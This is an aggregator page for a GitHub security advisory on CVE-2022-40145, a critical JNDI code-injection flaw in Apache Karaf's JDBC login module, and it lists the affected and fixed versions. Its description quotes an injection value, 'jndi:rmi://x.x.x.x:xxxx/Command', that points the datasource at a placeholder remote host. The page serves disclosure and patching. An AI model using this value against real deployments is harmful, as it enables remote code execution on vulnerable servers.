Ecosyste.ms: Advisories

An open API service providing security vulnerability metadata for many open source software ecosystems.

Security Advisories: GSA_kwCzR0hTQS1jMnA0LThtdnYtcndtds4AAwel

Apache Karaf vulnerable to potential code injection

This vulnerability is about a potential code injection when an attacker has control of the target LDAP server using in the JDBC JNDI URL. The function jaas.modules.src.main.java.porg.apache.karaf.jass.modules.jdbc.JDBCUtils#doCreateDatasource uses InitialContext.lookup(jndiName) without filtering. A user can modify options.put(JDBCUtils.DATASOURCE, "osgi:" + DataSource.class.getName()); to options.put(JDBCUtils.DATASOURCE,"jndi:rmi://x.x.x.x:xxxx/Command"); in JdbcLoginModuleTest#setup. This is vulnerable to a remote code execution (RCE) attack when a configuration uses a JNDI LDAP data source URI when an attacker has control of the target LDAP server. This issue affects all versions of Apache Karaf up to 4.4.1 and 4.3.7. Maintainers encourage the users to upgrade to at least Apache Karaf versions 4.4.2 or 4.3.8.

Permalink: https://github.com/advisories/GHSA-c2p4-8mvv-rwmv
JSON: https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS1jMnA0LThtdnYtcndtds4AAwel
Source: GitHub Advisory Database
Origin: Unspecified
Severity: Critical
Classification: General
Published: over 1 year ago
Updated: about 1 year ago


CVSS Score: 9.8
CVSS vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Identifiers: GHSA-c2p4-8mvv-rwmv, CVE-2022-40145
References: Repository: https://github.com/apache/karaf
Blast Radius: 30.4

Affected Packages

maven:org.apache.karaf:apache-karaf
Dependent packages: 220
Dependent repositories: 1,259
Downloads:
Affected Version Ranges: >= 4.4.0, < 4.4.2, < 4.3.8
Fixed in: 4.4.2, 4.3.8
All affected versions: 2.0.0, 2.1.0, 2.1.1, 2.1.2, 2.1.3, 2.1.4, 2.1.5, 2.1.6, 2.2.0, 2.2.1, 2.2.2, 2.2.3, 2.2.4, 2.2.5, 2.2.6, 2.2.7, 2.2.8, 2.2.9, 2.2.10, 2.2.11, 2.3.0, 2.3.1, 2.3.2, 2.3.3, 2.3.4, 2.3.5, 2.3.6, 2.3.7, 2.3.8, 2.3.9, 2.3.10, 2.3.11, 2.3.12, 2.4.0, 2.4.1, 2.4.2, 2.4.3, 2.4.4, 3.0.0, 3.0.1, 3.0.2, 3.0.3, 3.0.4, 3.0.5, 3.0.6, 3.0.7, 3.0.8, 3.0.9, 3.0.10, 4.0.0, 4.0.1, 4.0.2, 4.0.3, 4.0.4, 4.0.5, 4.0.6, 4.0.7, 4.0.8, 4.0.9, 4.0.10, 4.1.0, 4.1.1, 4.1.2, 4.1.3, 4.1.4, 4.1.5, 4.1.6, 4.2.0, 4.2.1, 4.2.3, 4.2.4, 4.2.5, 4.2.6, 4.2.7, 4.2.8, 4.2.9, 4.2.10, 4.2.11, 4.2.12, 4.2.13, 4.2.14, 4.2.15, 4.2.16, 4.3.0, 4.3.1, 4.3.2, 4.3.3, 4.3.4, 4.3.5, 4.3.6, 4.3.7, 4.4.0, 4.4.1
All unaffected versions: 4.3.8, 4.3.9, 4.3.10, 4.4.2, 4.4.3, 4.4.4, 4.4.5